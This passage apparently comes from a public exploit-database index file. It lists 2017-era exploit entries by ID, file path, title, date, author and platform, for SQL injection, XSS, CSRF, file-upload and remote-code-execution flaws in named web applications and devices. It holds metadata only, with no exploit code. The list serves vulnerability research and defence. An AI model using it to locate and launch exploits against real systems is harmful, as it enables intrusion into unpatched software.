Injection",2017-03-09,"Ihsan Sencan",php,webapps, -41563,exploits/php/webapps/41563.txt,"TradeMart 1.1 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps, -41564,exploits/php/webapps/41564.php,"Drupal 7.x Module Services - Remote Code Execution",2017-03-09,"Charles Fol",php,webapps, -41566,exploits/php/webapps/41566.txt,"WordPress Plugin Mac Photo Gallery 3.0 - Arbitrary File Download",2017-03-09,"Ihsan Sencan",php,webapps, -41567,exploits/php/webapps/41567.txt,"WordPress Plugin Apptha Slider Gallery 1.0 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps, -41568,exploits/php/webapps/41568.txt,"WordPress Plugin Apptha Slider Gallery 1.0 - Arbitrary File Download",2017-03-09,"Ihsan Sencan",php,webapps, -41569,exploits/php/webapps/41569.txt,"WordPress Plugin PICA Photo Gallery 1.0 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps, -41570,exploits/linux/webapps/41570.py,"Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution",2017-03-07,"Vex Woo",linux,webapps, -41571,exploits/hardware/webapps/41571.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting",2017-03-08,"Bruno Bierbaumer",hardware,webapps, -41572,exploits/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",hardware,webapps, -41573,exploits/hardware/webapps/41573.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution",2017-03-08,"Bruno Bierbaumer",hardware,webapps, -41574,exploits/xml/webapps/41574.html,"FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery",2017-03-10,hyp3rlinx,xml,webapps,52986 -42393,exploits/php/webapps/42393.txt,"VehicleWorkshop - SQL Injection",2017-07-28,"Shahab Shamsi",php,webapps, -42392,exploits/multiple/webapps/42392.py,"GitHub Enterprise < 2.8.7 - Remote Code Execution",2017-03-15,orange,multiple,webapps, -41577,exploits/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps, -41579,exploits/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps, -41578,exploits/cgi/webapps/41578.txt,"dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting",2017-03-10,"Shorebreak Security",cgi,webapps, -41580,exploits/php/webapps/41580.pl,"e107 < 2.1.4 - 'keyword' Blind SQL Injection",2017-03-09,StAkeR,php,webapps, -41582,exploits/php/webapps/41582.txt,"Domain Marketplace Script - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps, -41583,exploits/php/webapps/41583.txt,"Global In - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps, -41584,exploits/php/webapps/41584.txt,"Global In - Arbitrary File Upload",2017-03-11,"Ihsan Sencan",php,webapps, -41585,exploits/php/webapps/41585.txt,"Vanelo - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps, -41593,exploits/php/webapps/41593.txt,"Mirage - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps, -41586,exploits/php/webapps/41586.txt,"Pet Listing Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps, -41587,exploits/php/webapps/41587.txt,"Property Listing Script 3.1 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps, -41588,exploits/php/webapps/41588.txt,"Travel Tours Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps, -41589,exploits/php/webapps/41589.txt,"Yacht Listing Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps, -41590,exploits/php/webapps/41590.txt,"Yellow Pages Script 3.2 - 'category_id' SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps, -41591,exploits/php/webapps/41591.txt,"PHP Forum Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps, -41594,exploits/php/webapps/41594.txt,"Fiyo CMS 2.0.6.1 - Privilege Escalation",2017-03-11,rungga_reksya,php,webapps, -41599,exploits/php/webapps/41599.txt,"Joomla! Component Simple Membership 3.3.3 - 'userId' SQL Injection",2017-03-14,"Ihsan Sencan",php,webapps, -41600,exploits/php/webapps/41600.txt,"Joomla! Component Advertisement Board 3.0.4 - 'id' SQL Injection",2017-03-14,"Ihsan Sencan",php,webapps, -41602,exploits/php/webapps/41602.txt,"Joomla! Component Vik Appointments 1.5 - SQL Injection",2017-03-15,"Ihsan Sencan",php,webapps, -41603,exploits/php/webapps/41603.txt,"Joomla! Component Vik Rent Items 1.3 - SQL Injection",2017-03-15,"Ihsan Sencan",php,webapps, -41604,exploits/php/webapps/41604.txt,"Joomla! Component Vik Rent Car 1.11 - SQL Injection",2017-03-15,"Ihsan Sencan",php,webapps, -41616,exploits/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,ruby,webapps, -41617,exploits/php/webapps/41617.txt,"Steam Profile Integration 2.0.11 - SQL injection",2017-03-13,DrWhat,php,webapps, -41618,exploits/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",aspx,webapps, -41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",php,webapps, -41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,hardware,webapps, -41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,hardware,webapps, -41627,exploits/php/webapps/41627.txt,"Departmental Store Management System 1.2 - SQL Injection",2017-03-17,"Ihsan Sencan",php,webapps, -41628,exploits/linux/webapps/41628.py,"Cobbler 2.8.0 - Authenticated Remote Code Execution",2017-03-16,"Dolev Farhi",linux,webapps, -41632,exploits/php/webapps/41632.txt,"iFdate Social Dating Script 2.0 - SQL Injection",2017-03-18,"Ihsan Sencan",php,webapps, -41633,exploits/hardware/webapps/41633.txt,"DIGISOL DG-HR1400 1.00.02 Wireless Router - Privilege Escalation",2017-03-18,Indrajith.A.N,hardware,webapps, -41634,exploits/php/webapps/41634.txt,"Omegle Clone - SQL Injection",2017-03-18,"Ihsan Sencan",php,webapps, -41636,exploits/php/webapps/41636.txt,"Secure Download Links - 'dc' SQL Injection",2017-03-19,"Ihsan Sencan",php,webapps, -41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",php,webapps, -41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",php,webapps, -41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",php,webapps,80 -41662,exploits/hardware/webapps/41662.py,"D-Link DGS-1510 - Multiple Vulnerabilities",2017-03-20,"Varang Amin",hardware,webapps, -41663,exploits/php/webapps/41663.txt,"Joomla! Component Extra Search 2.2.8 - 'establename' SQL Injection",2017-03-21,"Ihsan Sencan",php,webapps, -41665,exploits/php/webapps/41665.txt,"GLink Word Link Script 1.2.3 - SQL Injection",2017-03-22,"Ihsan Sencan",php,webapps, -41671,exploits/hardware/webapps/41671.txt,"Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities",2017-03-22,"SEC Consult",hardware,webapps, -41673,exploits/php/webapps/41673.txt,"Joomla! Component Modern Booking 1.0 - 'coupon' SQL Injection",2017-03-22,"Hamed Izadi",php,webapps, -41674,exploits/php/webapps/41674.txt,"Flippa Clone - SQL Injection",2017-03-23,"Ihsan Sencan",php,webapps, -41676,exploits/linux/webapps/41676.rb,"Centreon < 2.5.1 / Centreon Enterprise Server < 2.2 - SQL Injection / Command Injection (Metasploit)",2014-10-15,Metasploit,linux,webapps, -41677,exploits/linux/webapps/41677.rb,"D-Link/TRENDnet - NCC Service Command Injection (Metasploit)",2015-02-26,Metasploit,linux,webapps, -41787,exploits/php/webapps/41787.txt,"Maian Uploader 4.0 - 'user' SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps, -41788,exploits/php/webapps/41788.txt,"Maian Survey 1.1 - 'survey' SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps, -41789,exploits/php/webapps/41789.txt,"Maian Greetings 2.1 - 'cat' SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps, -41685,exploits/multiple/webapps/41685.rb,"MantisBT 1.2.0a3 < 1.2.17 - XmlImportExport Plugin PHP Code Injection (Metasploit)",2014-11-18,Metasploit,multiple,webapps, -41686,exploits/multiple/webapps/41686.rb,"OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'license.php' Remote Command Execution (Metasploit)",2015-01-25,Metasploit,multiple,webapps, -41687,exploits/multiple/webapps/41687.rb,"OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'welcome' Remote Command Execution (Metasploit)",2015-01-05,Metasploit,multiple,webapps, -41688,exploits/multiple/webapps/41688.rb,"PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)",2016-12-26,Metasploit,multiple,webapps, -41691,exploits/multiple/webapps/41691.rb,"SysAid Help Desk Administrator Portal < 14.4 - Arbitrary File Upload (Metasploit)",2015-06-03,Metasploit,multiple,webapps, -41692,exploits/multiple/webapps/41692.rb,"WordPress Plugin Ninja Forms 2.9.36 < 2.9.42 - Unauthenticated File Upload (Metasploit)",2016-05-04,Metasploit,multiple,webapps, -41697,exploits/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps, -41698,exploits/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps, -41714,exploits/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps, -42804,exploits/php/webapps/42804.txt,"WordPress Plugin School Management System - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps, -42058,exploits/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps, -42547,exploits/hardware/webapps/42547.py,"Wireless Repeater BE126 - Local File Inclusion",2017-08-23,"Hay Mizrachi",hardware,webapps, -42545,exploits/php/webapps/42545.txt,"Matrimonial Script - SQL Injection",2017-08-22,"Ihsan Sencan",php,webapps, -42453,exploits/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps, -42621,exploits/php/webapps/42621.html,"Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps, -42640,exploits/php/webapps/42640.txt,"Online Print Business 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps, -42544,exploits/java/webapps/42544.py,"Automated Logic WebCTRL 6.5 - Unrestricted File Upload / Remote Code Execution",2017-08-22,LiquidWorm,java,webapps, -41899,exploits/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps, -41716,exploits/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps, -41717,exploits/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps, -41724,exploits/php/webapps/41724.txt,"Just Another Video Script 1.4.3 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps, -41725,exploits/php/webapps/41725.txt,"Adult Tube Video Script - SQL Injection",2017-03-25,"Ihsan Sencan",php,webapps, -41726,exploits/php/webapps/41726.txt,"Alibaba Clone Script - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps, -41727,exploits/php/webapps/41727.txt,"B2B Marketplace Script 2.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps, -41728,exploits/php/webapps/41728.txt,"Php Real Estate Property Script - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps, -41729,exploits/php/webapps/41729.txt,"Courier Tracking Software 6.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps, -41730,exploits/php/webapps/41730.txt,"Parcel Delivery Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps, -41731,exploits/php/webapps/41731.txt,"Delux Same Day Delivery Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps, -41732,exploits/php/webapps/41732.txt,"Hotel Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps, -41733,exploits/php/webapps/41733.txt,"Tour Package Booking 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps, -41735,exploits/php/webapps/41735.txt,"Professional Bus Booking Script - 'hid_Busid' SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps, -41736,exploits/php/webapps/41736.txt,"CouponPHP CMS 3.1 - 'code' SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps, -41746,exploits/php/webapps/41746.txt,"EyesOfNetwork (EON) 5.0 - Remote Code Execution",2017-03-27,Sysdream,php,webapps, -41747,exploits/php/webapps/41747.txt,"EyesOfNetwork (EON) 5.0 - SQL Injection",2017-03-27,Sysdream,php,webapps, -41748,exploits/jsp/webapps/41748.rb,"Nuxeo 6.0/7.1/7.2/7.3 - Remote Code Execution (Metasploit)",2017-03-27,Sysdream,jsp,webapps, -41749,exploits/php/webapps/41749.txt,"inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation",2017-03-27,"Tim Herres",php,webapps, -41758,exploits/php/webapps/41758.txt,"Opensource Classified Ads Script - 'keyword' SQL Injection",2017-03-29,"Ihsan Sencan",php,webapps, -41774,exploits/php/webapps/41774.py,"EyesOfNetwork (EON) 5.1 - SQL Injection",2017-03-29,"Dany Bach",php,webapps, -41779,exploits/multiple/webapps/41779.txt,"Splunk Enterprise - Information Disclosure",2017-03-31,hyp3rlinx,multiple,webapps, -41780,exploits/php/webapps/41780.txt,"Membership Formula - 'order' SQL Injection",2017-03-31,"Ihsan Sencan",php,webapps, -41816,exploits/php/webapps/41816.txt,"ImagePro Lazygirls Clone Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps, -41817,exploits/php/webapps/41817.txt,"Airbnb Crashpadder Clone Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps, -41818,exploits/php/webapps/41818.txt,"Premium Penny Auction Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps, -41819,exploits/php/webapps/41819.txt,"Sweepstakes Pro Software - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps, -41820,exploits/php/webapps/41820.txt,"Appointment Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps, -41821,exploits/hardware/webapps/41821.txt,"D-Link DIR-615 - Cross-Site Request Forgery",2017-04-05,"Pratik S. Shah",hardware,webapps, -41822,exploits/php/webapps/41822.txt,"GeoMoose < 2.9.2 - Directory Traversal",2017-04-03,"Sander Ferdinand",php,webapps, -41828,exploits/php/webapps/41828.php,"Moodle 2.x/3.x - SQL Injection",2017-04-06,"Marko Belzetski",php,webapps, -41824,exploits/php/webapps/41824.txt,"HelpDEZK 1.1.1 - Cross-Site Request Forgery / Code Execution",2017-04-05,rungga_reksya,php,webapps, -41829,exploits/hardware/webapps/41829.txt,"Intellinet NFC-30IR Camera - Multiple Vulnerabilities",2017-04-07,"Dimitri Fousekis",hardware,webapps, -41830,exploits/php/webapps/41830.txt,"Faveo Helpdesk Community 1.9.3 - Cross-Site Request Forgery",2017-04-05,rungga_reksya,php,webapps, -41831,exploits/php/webapps/41831.txt,"Invoice Template - 'hash' SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps, -41832,exploits/php/webapps/41832.txt,"Document Management Template - 'hash' SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps, -41833,exploits/php/webapps/41833.txt,"Shopping Cart Template - 'item' SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps, -41834,exploits/php/webapps/41834.txt,"Calendar Template 2.0 - 'editid1' SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps, -41835,exploits/php/webapps/41835.txt,"Forum Template 1.0 - SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps, -41836,exploits/php/webapps/41836.txt,"Quiz Template 1.0 - 'testid' SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps, -41837,exploits/php/webapps/41837.txt,"Survey Template 1.1 - 'masterkey1' SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps, -41838,exploits/php/webapps/41838.txt,"My Gaming Ladder Combo System 7.5 - SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps, -41839,exploits/php/webapps/41839.txt,"Ladder System 6.0 - 'faqid' SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps, -41840,exploits/hardware/webapps/41840.txt,"D-Link DWR-116 / DWR-116A1 - Arbitrary File Download",2017-04-07,"Patryk Bogdan",hardware,webapps, -41841,exploits/php/webapps/41841.html,"WordPress Plugin Firewall 2 1.3 - Cross-Site Request Forgery / Cross-Site Scripting",2017-04-07,dxw,php,webapps,80 -41842,exploits/cgi/webapps/41842.txt,"QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection",2017-04-07,"Harry Sintonen",cgi,webapps, -42085,exploits/hardware/webapps/42085.py,"uc-http Daemon - Local File Inclusion / Directory Traversal",2017-05-30,"Project Insecurity",hardware,webapps, -41844,exploits/php/webapps/41844.html,"e107 CMS 2.1.4 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps, -41845,exploits/php/webapps/41845.txt,"WordPress Plugin WHIZZ < 1.1.1 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,80 -41846,exploits/php/webapps/41846.html,"WordPress Plugin CopySafe Web Protect < 2.6 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,80 -42089,exploits/xml/webapps/42089.txt,"Trend Micro Deep Security 6.5 - XML External Entity Injection / Local Privilege Escalation / Remote Code Execution",2017-05-30,SecuriTeam,xml,webapps, -42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,multiple,webapps, -42091,exploits/windows/webapps/42091.txt,"IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow",2017-05-30,SecuriTeam,windows,webapps, -41849,exploits/php/webapps/41849.txt,"Jobscript4Web 4.5 - Authentication Bypass",2017-04-08,TurkCyberArmy,php,webapps, -41855,exploits/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Thomas Sluyter",xml,webapps,8400 -41856,exploits/php/webapps/41856.txt,"MyClassifiedScript 5.1 - SQL Injection",2017-04-11,"Ihsan Sencan",php,webapps, -41858,exploits/php/webapps/41858.txt,"Social Directory Script 2.0 - SQL Injection",2017-04-11,"Ihsan Sencan",php,webapps, -41859,exploits/php/webapps/41859.txt,"FAQ Script 3.1.3 - 'category_id' SQL Injection",2017-04-11,"Ihsan Sencan",php,webapps, -41857,exploits/php/webapps/41857.txt,"WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection",2017-04-11,"Manuel García Cárdenas",php,webapps,80 -41860,exploits/php/webapps/41860.txt,"MyBB < 1.8.11 - 'email' MyCode Cross-Site Scripting",2017-04-11,"Zhiyang Zeng",php,webapps,80 -41862,exploits/php/webapps/41862.txt,"MyBB smilie Module < 1.8.11 - 'pathfolder' Directory Traversal",2017-04-11,"Zhiyang Zeng",php,webapps,80 -41863,exploits/hardware/webapps/41863.php,"Brother MFC-J6520DW - Authentication Bypass / Password Change",2017-04-11,"Patryk Bogdan",hardware,webapps, -41864,exploits/php/webapps/41864.txt,"Horde Groupware Webmail 3/4/5 - Multiple Remote Code Executions",2017-04-11,SecuriTeam,php,webapps, -41865,exploits/multiple/webapps/41865.html,"Apple WebKit / Safari 10.0.3 (12602.4.8) - Synchronous Page Load Universal Cross-Site Scripting",2017-04-11,"Google Security Research",multiple,webapps, -41866,exploits/multiple/webapps/41866.html,"Apple WebKit / Safari 10.0.3 (12602.4.8) - Universal Cross-Site Scripting via a Focus Event and a Link Element",2017-04-11,"Google Security Research",multiple,webapps, -41876,exploits/php/webapps/41876.txt,"Coppermine Gallery < 1.5.44 - Directory Traversal Weaknesses",2017-02-15,"Hacker Fantastic",php,webapps, -41877,exploits/multiple/webapps/41877.txt,"SedSystems D3 Decimator - Multiple Vulnerabilities",2016-01-11,prdelka,multiple,webapps,9784 -41881,exploits/multiple/webapps/41881.html,"agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery",2017-04-13,"SySS GmbH",multiple,webapps, -41882,exploits/multiple/webapps/41882.html,"agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting",2017-04-13,"SySS GmbH",multiple,webapps, -41884,exploits/php/webapps/41884.rb,"Alienvault OSSIM/USM 5.3.4/5.3.5 - Remote Command Execution (Metasploit)",2017-04-13,"Peter Lapp",php,webapps, -41885,exploits/php/webapps/41885.txt,"Concrete5 CMS 8.1.0 - 'Host' Header Injection",2017-04-14,hyp3rlinx,php,webapps, -41890,exploits/php/webapps/41890.txt,"Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset",2017-04-16,hyp3rlinx,php,webapps, -41900,exploits/multiple/webapps/41900.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'operationSpreadGeneric' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps, -41918,exploits/php/webapps/41918.txt,"FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-25,"Cyril Vallicari",php,webapps, -41919,exploits/php/webapps/41919.txt,"WordPress Plugin KittyCatfish 2.2 - SQL Injection",2017-04-25,"TAD GROUP",php,webapps,80 -41920,exploits/php/webapps/41920.txt,"WordPress Plugin Car Rental System 2.5 - SQL Injection",2017-04-25,"TAD GROUP",php,webapps,80 -41921,exploits/php/webapps/41921.txt,"WordPress Plugin Wow Viral Signups 2.1 - SQL Injection",2017-04-25,"TAD GROUP",php,webapps,80 -41922,exploits/php/webapps/41922.txt,"WordPress Plugin Wow Forms 2.1 - SQL Injection",2017-04-25,"TAD GROUP",php,webapps,80 -41925,exploits/xml/webapps/41925.txt,"Oracle PeopleSoft - 'PeopleSoftServiceListeningConnector' XML External Entity via DOCTYPE (PoC)",2017-04-25,ERPScan,xml,webapps, -41926,exploits/jsp/webapps/41926.txt,"Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection",2017-04-25,ERPScan,jsp,webapps, -41927,exploits/multiple/webapps/41927.txt,"HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting / Remote File Inclusion",2017-04-25,"Paolo Stagno",multiple,webapps, -41928,exploits/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",multiple,webapps, -41930,exploits/php/webapps/41930.txt,"Joomla! Component Myportfolio 3.0.2 - 'pid' SQL Injection",2017-04-24,"Persian Hack Team",php,webapps, -41936,exploits/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80 -41939,exploits/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",php,webapps, -41940,exploits/php/webapps/41940.py,"TYPO3 Extension News - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80 -41943,exploits/php/webapps/41943.py,"Simple File Uploader - Arbitrary File Download",2017-04-27,"Daniel Godoy",php,webapps, -41944,exploits/php/webapps/41944.txt,"Easy File Uploader - Arbitrary File Upload",2017-04-27,"Daniel Godoy",php,webapps, -41946,exploits/multiple/webapps/41946.txt,"Emby MediaServer 3.2.5 - SQL Injection",2017-04-30,LiquidWorm,multiple,webapps, -41947,exploits/multiple/webapps/41947.txt,"Emby MediaServer 3.2.5 - Password Reset",2017-04-30,LiquidWorm,multiple,webapps, -41948,exploits/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps, -41950,exploits/linux/webapps/41950.py,"Alerton Webtalk 2.5/3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps, -41953,exploits/php/webapps/41953.md,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps, -41958,exploits/java/webapps/41958.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure",2017-05-03,LiquidWorm,java,webapps, -41960,exploits/java/webapps/41960.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change",2017-05-03,LiquidWorm,java,webapps, -41961,exploits/windows/webapps/41961.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution",2017-05-03,LiquidWorm,windows,webapps, -41962,exploits/linux/webapps/41962.sh,"WordPress 4.6 - Unauthenticated Remote Code Execution",2017-05-03,"Dawid Golunski",linux,webapps, -41963,exploits/linux/webapps/41963.txt,"WordPress < 4.7.4 - Unauthorized Password Reset",2017-05-03,"Dawid Golunski",linux,webapps, -41966,exploits/php/webapps/41966.txt,"WordPress Plugin WebDorado Gallery 1.3.29 - SQL Injection",2017-05-05,defensecode,php,webapps,80 -41967,exploits/php/webapps/41967.txt,"ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities",2017-05-05,Sysdream,php,webapps,80 -41976,exploits/linux/webapps/41976.py,"LogRhythm Network Monitor - Authentication Bypass / Command Injection",2017-04-24,"Francesco Oddo",linux,webapps, -41979,exploits/php/webapps/41979.txt,"I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting",2017-05-09,"SEC Consult",php,webapps, -41985,exploits/aspx/webapps/41985.txt,"Personify360 7.5.2/7.6.1 - Improper Access Restrictions",2017-05-09,"Pesach Zirkind",aspx,webapps, -41986,exploits/aspx/webapps/41986.txt,"Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions",2017-05-09,"Pesach Zirkind",aspx,webapps, -41988,exploits/php/webapps/41988.txt,"QNAP PhotoStation 5.2.4 / MusicStation 4.8.4 - Authentication Bypass",2017-05-10,"Kacper Szurek",php,webapps,8080 -41989,exploits/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,php,webapps, -41990,exploits/php/webapps/41990.html,"Gongwalker API Manager 1.1 - Cross-Site Request Forgery",2017-05-10,HaHwul,php,webapps, -41997,exploits/php/webapps/41997.txt,"CMS Made Simple 2.1.6 - Multiple Vulnerabilities",2017-05-10,"Osanda Malith",php,webapps, -41998,exploits/hardware/webapps/41998.txt,"Zyxel P-660HW-61 Firmware < 3.40(PE.11)C0 Router - Local File Inclusion",2017-05-02,ReverseBrain,hardware,webapps, -42003,exploits/php/webapps/42003.txt,"PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload",2017-05-14,"Touhid M.Shaikh",php,webapps,80 -42004,exploits/php/webapps/42004.txt,"Mailcow 0.14 - Cross-Site Request Forgery",2017-05-15,hyp3rlinx,php,webapps, -42005,exploits/php/webapps/42005.txt,"Admidio 3.2.8 - Cross-Site Request Forgery",2017-04-28,"Faiz Ahmed Zaidi",php,webapps, -42012,exploits/php/webapps/42012.txt,"Sophos Web Appliance 4.3.1.1 - Session Fixation",2017-02-28,SlidingWindow,php,webapps, -42013,exploits/hardware/webapps/42013.txt,"Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 SP2 - Multiple Vulnerabilities",2017-01-12,SlidingWindow,hardware,webapps, -42028,exploits/xml/webapps/42028.txt,"INFOR EAM 11.0 Build 201410 - 'filtervalue' SQL Injection",2017-05-17,Yoroi,xml,webapps, -42029,exploits/xml/webapps/42029.txt,"INFOR EAM 11.0 Build 201410 - Persistent Cross-Site Scripting via Comment Fields",2017-05-17,Yoroi,xml,webapps, -42082,exploits/php/webapps/42082.txt,"WordPress Plugin Huge-IT Video Gallery 2.0.4 - SQL Injection",2017-05-29,defensecode,php,webapps,80 -42033,exploits/php/webapps/42033.txt,"Joomla! 3.7.0 - 'com_fields' SQL Injection (PoC)",2017-05-19,"Mateus Lino",php,webapps,80 -42034,exploits/java/webapps/42034.txt,"Oracle PeopleSoft - Server-Side Request Forgery",2017-05-19,ERPScan,java,webapps, -42035,exploits/php/webapps/42035.txt,"Belden Garrettcom 6K/10K Switches - Authentication Bypass / Memory Corruption",2017-05-19,"David Tomaschik",php,webapps, -42036,exploits/xml/webapps/42036.txt,"SAP Business One for Android 1.2.3 - XML External Entity Injection",2017-05-19,"Ravindra Singh Rathore",xml,webapps, -42037,exploits/java/webapps/42037.txt,"ManageEngine ServiceDesk Plus 9.0 - Authentication Bypass",2017-05-19,ByteM3,java,webapps, -42038,exploits/php/webapps/42038.txt,"PlaySMS 1.4 - Remote Code Execution",2017-05-19,"Touhid M.Shaikh",php,webapps,80 